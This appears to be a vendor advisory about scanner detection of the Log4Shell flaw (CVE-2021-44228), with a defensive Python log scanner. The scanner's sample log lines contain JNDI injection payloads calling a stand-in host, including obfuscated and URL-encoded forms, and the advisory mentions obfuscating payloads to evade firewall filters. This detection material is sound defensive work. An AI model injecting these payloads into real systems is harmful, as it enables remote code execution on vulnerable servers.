An emergency detection was deployed on Friday 10th December to detect this flaw based on the most common payload vector. Over the weekend (11th and 12th), AppCheck has been closely monitoring public attack vectors and has released a comprehensive detection that is available to all clients across all scans and profiles.
Current features include:
- Detection via HTTP servers and intermediaries by injecting into parameters, paths and headers.
- Payload obfuscation to evade some flawed filters deployed via Web Application Firewalls and Cloud Security solutions.
- Multiple protocol handler support: dns, rmi and ldap by default.
- Detection via Web Application Scanning and Infrastructure scanning.
- Detection via HTTP/2 headers.
- Attacks via DNS response: submitting a specially crafted hostname that, when resolved, returns the Log4Shell payload in the name text of the A record. If this record is then resolved and stored, it triggers a ping back to AppCheck Sentinel.
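The obfuscation and protocol-handler items above describe what a scanner (or a log-monitoring team) has to see through. The following added example, written for this page and not AppCheck's own code, shows the defender's side of that: it unwinds the Log4j lookup nesting (`${lower:}`, `${upper:}` and the `:-` default-value form) and URL-encoding, then flags lines that carry a JNDI lookup using the dns, rmi or ldap handlers named above. The log lines are constructed, and the `_resolve` rules are a static approximation of Log4j's Interpolator (environment and system lookups are assumed to fail on the logging host).

```python
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body does not itself open another ${.
INNER = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")
# Handlers named in the advisory (dns, rmi, ldap) plus ldaps; Log4j matches the prefix case-insensitively.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.IGNORECASE)

def _resolve(body):
    """Evaluate one lookup body as Log4j's Interpolator would; None if it cannot be resolved statically."""
    key, sep, rest = body.partition(":")
    k = key.strip().lower()
    if sep and k in ("lower", "upper"):
        return rest.lower() if k == "lower" else rest.upper()
    # "${prefix:name:-default}" yields the default when the lookup fails; "${::-j}" (empty key) always does.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None

def _sub(m):
    r = _resolve(m.group(1))
    return m.group(0) if r is None else r

def normalize(text):
    """URL-decode (twice, for double encoding), then collapse innermost lookups until stable."""
    text = unquote(unquote(text))
    for _ in range(20):  # bounded: each round removes at least one ${...} or stops
        new = INNER.sub(_sub, text)
        if new == text:
            break
        text = new
    return text

def scan_log(lines):
    """Return (line_no, handler) for each line carrying a JNDI lookup once de-obfuscated."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits

# Constructed access-log lines (not real traffic): plain, two obfuscated forms, URL-encoded, benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2021:10:00:01 +0000] "GET /?q=${jndi:ldap://example.invalid/a} HTTP/1.1" 200 "-"',
    '203.0.113.6 - - [11/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://example.invalid/b}"',
    '203.0.113.7 - - [11/Dec/2021:10:00:03 +0000] "GET /${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c} HTTP/1.1" 404 "-"',
    '203.0.113.8 - - [11/Dec/2021:10:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fd%7D HTTP/1.1" 200 "-"',
    '203.0.113.9 - - [11/Dec/2021:10:00:05 +0000] "GET /?q=${price}&h=${env:HOME:-/tmp} HTTP/1.1" 200 "-"',
]
```

Running `scan_log(SAMPLE_LOG)` flags the first four lines with their handlers and leaves the benign `${price}` line alone; the same normalisation step is what distinguishes a filter that only matches the literal string `${jndi:` from one that also catches the nested forms.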
Any existing scans will have this plugin enabled. A dedicated Scan Profile has also been created for customers wishing to scan for this CVE only.
Right now, we believe AppCheck offers the most comprehensive detection available via scanning. However, the nature of this flaw means that there are many possible vectors that are still to be discovered. Our research team are investigating the situation and will be updating our detection as we discover new vectors and affected protocols.
Whilst AppCheck strongly recommends that all customers scan under this profile if they wish to check specifically for this vulnerability on their web applications and infrastructure, it is also recommended that all customers conduct their own checks. The true impact and scale of this vulnerability are yet to be understood, given the evolving nature of the disclosure, the wide range of products affected and the many vectors of exploitation.
As an advisory for all customers, AppCheck is aware that the initial fix for CVE-2021-44228 (in 2.15.0) is incomplete in certain non-default configurations (CVE-2021-45046); the recommendation is to upgrade to 2.16.0.
More detail to follow.